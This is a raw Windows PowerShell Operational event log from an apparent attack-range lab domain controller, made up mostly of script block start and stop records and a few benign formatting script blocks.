ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479067
Keywords=None
Message=Completed invocation of ScriptBlock ID: ab08d06b-e77b-4ba9-b07f-36e40d1b53cd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479066
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479065
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479064
Keywords=None
Message=Started invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479063
Keywords=None
Message=Started invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479062
Keywords=None
Message=Started invocation of ScriptBlock ID: ab08d06b-e77b-4ba9-b07f-36e40d1b53cd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479061
Keywords=None
Message=Started invocation of ScriptBlock ID: 8b6d6aa4-57ee-4061-8314-82885b07f2c4
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479060
Keywords=None
Message=Completed invocation of ScriptBlock ID: 53781394-c176-41ff-b5ee-289ee22c086b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479059
Keywords=None
Message=Started invocation of ScriptBlock ID: 53781394-c176-41ff-b5ee-289ee22c086b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479058
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479057
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479056
Keywords=None
Message=Completed invocation of ScriptBlock ID: 32d46f36-be94-4f0d-abe1-0c2f6b2cdf81
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479055
Keywords=None
Message=Started invocation of ScriptBlock ID: 32d46f36-be94-4f0d-abe1-0c2f6b2cdf81
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479054
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479053
Keywords=None
Message=Started invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479052
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479051
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479050
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479049
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479048
Keywords=None
Message=Completed invocation of ScriptBlock ID: 8b6d6aa4-57ee-4061-8314-82885b07f2c4
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479047
Keywords=None
Message=Completed invocation of ScriptBlock ID: 28b0d021-de54-4ece-9f97-e05084174e2f
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479046
Keywords=None
Message=Started invocation of ScriptBlock ID: 28b0d021-de54-4ece-9f97-e05084174e2f
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479045
Keywords=None
Message=Completed invocation of ScriptBlock ID: 6acf7ef5-6f9c-406b-a073-9c2ad6e0edec
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479044
Keywords=None
Message=Started invocation of ScriptBlock ID: 6acf7ef5-6f9c-406b-a073-9c2ad6e0edec
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479043
Keywords=None
Message=Completed invocation of ScriptBlock ID: ab08d06b-e77b-4ba9-b07f-36e40d1b53cd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479042
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479041
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479040
Keywords=None
Message=Started invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479039
Keywords=None
Message=Started invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479038
Keywords=None
Message=Started invocation of ScriptBlock ID: ab08d06b-e77b-4ba9-b07f-36e40d1b53cd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479037
Keywords=None
Message=Started invocation of ScriptBlock ID: 8b6d6aa4-57ee-4061-8314-82885b07f2c4
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479036
Keywords=None
Message=Completed invocation of ScriptBlock ID: 53781394-c176-41ff-b5ee-289ee22c086b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479035
Keywords=None
Message=Started invocation of ScriptBlock ID: 53781394-c176-41ff-b5ee-289ee22c086b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479034
Keywords=None
Message=Completed invocation of ScriptBlock ID: 8b6d6aa4-57ee-4061-8314-82885b07f2c4
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479033
Keywords=None
Message=Completed invocation of ScriptBlock ID: 28b0d021-de54-4ece-9f97-e05084174e2f
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479032
Keywords=None
Message=Started invocation of ScriptBlock ID: 28b0d021-de54-4ece-9f97-e05084174e2f
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1479031
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.OriginInfo }

ScriptBlock ID: 28b0d021-de54-4ece-9f97-e05084174e2f
Path:
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479030
Keywords=None
Message=Completed invocation of ScriptBlock ID: 6acf7ef5-6f9c-406b-a073-9c2ad6e0edec
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479029
Keywords=None
Message=Started invocation of ScriptBlock ID: 6acf7ef5-6f9c-406b-a073-9c2ad6e0edec
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1479028
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.ErrorCategory_Message }

ScriptBlock ID: 6acf7ef5-6f9c-406b-a073-9c2ad6e0edec
Path:
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479027
Keywords=None
Message=Completed invocation of ScriptBlock ID: ab08d06b-e77b-4ba9-b07f-36e40d1b53cd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479026
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479025
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479024
Keywords=None
Message=Started invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479023
Keywords=None
Message=Started invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479022
Keywords=None
Message=Started invocation of ScriptBlock ID: ab08d06b-e77b-4ba9-b07f-36e40d1b53cd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1479021
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.PSMessageDetails }

ScriptBlock ID: ab08d06b-e77b-4ba9-b07f-36e40d1b53cd
Path:
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479020
Keywords=None
Message=Started invocation of ScriptBlock ID: 8b6d6aa4-57ee-4061-8314-82885b07f2c4
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479019
Keywords=None
Message=Completed invocation of ScriptBlock ID: 53781394-c176-41ff-b5ee-289ee22c086b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479018
Keywords=None
Message=Started invocation of ScriptBlock ID: 53781394-c176-41ff-b5ee-289ee22c086b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479017
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479016
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479015
Keywords=None
Message=Completed invocation of ScriptBlock ID: 32d46f36-be94-4f0d-abe1-0c2f6b2cdf81
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479014
Keywords=None
Message=Started invocation of ScriptBlock ID: 32d46f36-be94-4f0d-abe1-0c2f6b2cdf81
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479013
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
